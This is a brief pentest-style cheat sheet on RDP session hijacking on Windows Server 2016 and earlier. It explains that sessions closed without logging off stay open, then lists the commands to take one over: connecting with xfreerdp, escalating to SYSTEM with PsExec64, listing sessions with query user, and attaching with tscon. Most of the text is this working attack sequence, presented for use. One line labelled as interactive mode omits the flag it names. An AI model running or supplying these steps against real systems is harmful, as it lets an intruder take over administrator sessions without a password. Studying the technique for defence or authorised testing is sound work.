RDP Hijacking
Administrators
Works only on Windows Server 2016 and Earlier
.
When an Administrator uses Remote Desktop to connect to a machine and closes the RDP
Client instead of Logging-Off, his Session will remain open on the server indefinitely. If we have SYSTEM
Privileges on Windows Server 2016 and Earlier, we can take over any existing RDP Session without requiring a password.
Hijacking the Session
Windows Server 2019
won't allow you to Connect to another User's Session without knowing its Password.If we have Administrator-Level Access, we can get SYSTEM by any method of our preference.
:: Connect via RDP
xfreerdp /v:TARGET /u:USERNAME /p:PASSWORD
:: Upload - Run [PsExec64]
PsExec64.exe -accepteula
:: Interactive Mode [-i]
PsExec64.exe -s cmd.exe
:: List Available Sessions
query user
query session
:: Connect to a Session
tscon ID /dest:OUR_SESSIONNAME